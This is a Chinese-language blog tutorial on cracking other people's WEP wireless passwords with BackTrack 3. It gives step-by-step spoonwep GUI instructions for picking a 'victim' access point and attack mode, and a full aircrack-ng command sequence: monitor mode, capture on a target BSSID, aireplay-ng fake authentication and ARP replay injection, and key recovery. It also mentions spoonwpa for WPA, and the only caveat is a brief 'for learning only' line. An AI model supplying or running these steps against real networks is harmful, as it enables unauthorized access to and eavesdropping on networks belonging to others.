backtrack3(BT3) usb版安裝 破解WEP無線網路密碼詳細步驟 )

【破解無線網路】BT3最新破解教程實戰(本方法屬暴力破解,僅供學習)

1、首先看一下自己的無線網卡是否支援BT3破解~

請參考：

【破解無線網路】BT3支援的網卡列表,BT3相容哪些網卡

2、需購置BT3光碟片一張，或者下載BT3隨身碟版~但是，筆者的實戰經驗表明，BT3隨身碟版成功的幾率比較小……對於顯卡的相容性比較高~筆者原先也用BT3隨身碟版破解……總是進不了BT3圖形介面……後來改用BT3光碟片，非常容易就進入了圖形介面……破解也非常方便~

BT3隨身碟版：

BT下載：
Torrent:

http://www.remote-exploit.org/bt3b141207.rar.torrent
http://www.offensive-security.com/bt3b141207.rar.torrent

至於怎麼安裝，可以在本部落格中找到~

3、將BT3光碟片放入光碟機，重新啟動電腦，選擇第一項BT3 Graphics mode(KDE);如果不選擇，會倒數10秒鐘自動進入~

（備忘：請確認您的電腦是光碟機啟動，一般電腦預設的都是光碟機啟動；如果不是，請先設定為光碟機啟動。部分ATI的顯卡進入BT3（LINUX）系統可能會報錯，這不屬於光碟片問題，請在網上下載ATI顯卡的補丁，或者在網上下載虛擬機器主機(VM)，就可以直接在XP中破解，VISTA系統下，也會進入不了BT3系統，請在XP下嘗試破解。）

4、進入BT3系統，再點擊左下角點擊左下角第二項，一個黑色的表徵圖會彈出一個黑色的對話方塊，像DOS介面一樣。

開啟一個命令視窗，輸入：spoonwep 斷行符號後10秒鐘左右彈出spoonwep2程式：

NET CARD 網卡介面 選擇 WLAN0
DRIVER 驅動 選擇 NORMAL
MODE 模式 選擇 UNKNOWN VICTIM

點 NEXT 轉到 VICTIMS DISCOVERY 視窗

CHAN HOPPING 是全頻段掃描 （建議選擇： FIXED CHAN，有針對性的掃描）
點擊右上方 LAUNCH 按鈕 (點完後會變成 ABORT ) 這時會彈出抓包視窗，可作為參考，也可不用理會。20秒

首先點擊左上方下拉式功能表選擇CHAN HOPPING→LAUNCH(點完後會變成ABORT )→會開始自動執行

註：

ESSID 路由廣播名稱

MAC 路由的地址

CHAN 使用的頻道

POW 訊號強度

DATA 資料包

CLIS 空白代表無用戶端，打鉤則代表有用戶端；

（備忘：無線網卡搜尋一陣子，被搜尋到的無線訊號的SSID將會列表顯示。如果某加密無線訊號的CLIS方框內有“勾”，表示該無線訊號此刻托有用戶端，這時破解會高效、快速一些。如果你選中了這樣的的訊號，緊接著視窗的下方會顯示出用戶端代表，你應該把下方的用戶端也選中1想參與破解。不要迷信一定要帶用戶端才能破解，沒有用戶端的AP也可以破解，裡路上POW值大於18的都可以破解的。）

有用戶端模式比無用戶端模式成功率要高，選中打算破解的路由，下面會顯示出當前所有連結到這個路由的用戶端，選擇一個POWER PACKETS都比較高的用戶端。

然後點 SELECTION OK 轉到 ATTACK PANEL 視窗

第一個下拉式功能表有4個選項，後面3個都可作為無用戶端攻擊模式，其中 ：
ARP REPLAY ATTACK （有用戶端時用）
P0841 REPLAY ATTACK (次次選）
CHOPCHOP & FORGEATTACK （次選）
FRAGMENTATION & FORGE ATTACK （首選）
第二個下拉式功能表有3個選項，其中：
??? LENGTH (不指定加密位元，首選）
128 BITS LENGTH （指定128位加密，次次選）
64 BITS LENGTH （指定64位加密，次選）
兩個下拉式功能表右邊的 Inj Rate 是每秒發包數量，選預設的600即可。
選擇好兩個下拉式功能表，點擊左邊 LAUNCH 按鈕 開始自動破解，破解速度和訊號強度成正比。

最下面的WEP KEY就是破解出來的密碼，無需輸入冒號。

註：有用戶端模式比無用戶端成功率要高。

註：破解WPA加密時，輸入命令為spoonwpa，其他動作步驟不變（但一定需要有用戶端串連才能破解）

backtrack3(BT3) usb版 破解WEP無線網路密碼詳細步驟（附軟體及中文包）

其他【破解無線網路】相關資料請參考：

http://hi.baidu.com/shanfeng9988/blog/item/376beb3c4d6d460abba1670d.html

一、先開始製作啟動隨身碟：

將下載好的backtrack3(BT3) usb版(在文章末尾)檔案bt3b141207.rar直接解壓到隨身碟（1G以上容量）。把Boot 和BT3兩個檔案夾放到隨身碟的根目錄，開啟BOOT檔案夾雙擊運行" bootinst.bat "批次檔。隨身碟裡就會多出4個檔案." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" （如果想要中文截面的BT3的菜單,就在下載BT3中文語言套件。：http://file.mofile.com/cn/docs/listallfiles.do
提取密碼：4871454552251231。（用的是免費的網路硬碟,廣告較多,有些朋友可能沒認真看沒找到，我說下大概位置，輸入提取碼後,拉到中間找下面的幾個字(紅色的) 以下這三個連結後兩個均可下載
推薦快車（flashget）高速下載檔案 下載檔案(IE瀏覽器) 下載檔案(非IE瀏覽器)
）把壓縮包裡的"中文包"解壓出來，將裡面的*.lzm檔案拷貝到u盤的BT3\modules目錄，即可實現bt3中文化。）
二、之後重啟 windows 進入BIOS設定，把BIOS裡的frist boot device設定為USB-HDD（或者是USB--ZIP）再重啟選擇從usb啟動。系統進入backtrack3 系統。

三、現在開始破解
1.在shell視窗中輸入 ifconfig 命令 ，出現如下資訊：
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:（......）Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.找出你的無線網卡名字，我這裡是 eth1.再啟動你的網卡為Moniter模式(輸入airmon-ng start eth1 11)。再輸入 ifconfig 命令 ，返回如下資訊：
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 輸入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的頻道號，bssid後面的數字表示破解目標的MAC物理地址，outputs表示要產生的包的名稱。斷行符號運行。
4.再開一個 shell 輸入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
其中“targetnet”表示破解目標網路名稱,00:1A:01:8D:C3:B2前面已解釋過是指目標MAC物理地址，00:A1:C1:D8:A5:B6表示本機網卡MAC物理地址
5.再開一個 shell 輸入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
擷取更多的資料包。
6.返回資料量到1萬的時候就可以破解了。再開一個shell輸入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 進行破解。如果破解不成功，讓它繼續抓包，直到破解。

BT3(backtrack3) usb版 列表
backtrack3(BT3) usb版 列表：（自己選個快的鏡像下）
BT下載：
Torrent: http://www.remote-exploit.org/bt3b141207.rar.torrent
http://www.offensive-security.com/bt3b141207.rar.torrent
FTP下載：

ftp://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
ftp://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
ftp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
HTTP下載：
http://mirror.switch.ch/ftp/mirror/backtrack/bt3b141207.rar
http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
http://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
http://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
http://ftp.belnet.be/mirror/backtrack/bt3b141207.rar
http://backtrack.mick27.info/bt3b141207.rar

原文地址：http://apps.hi.baidu.com/share/detail/1343416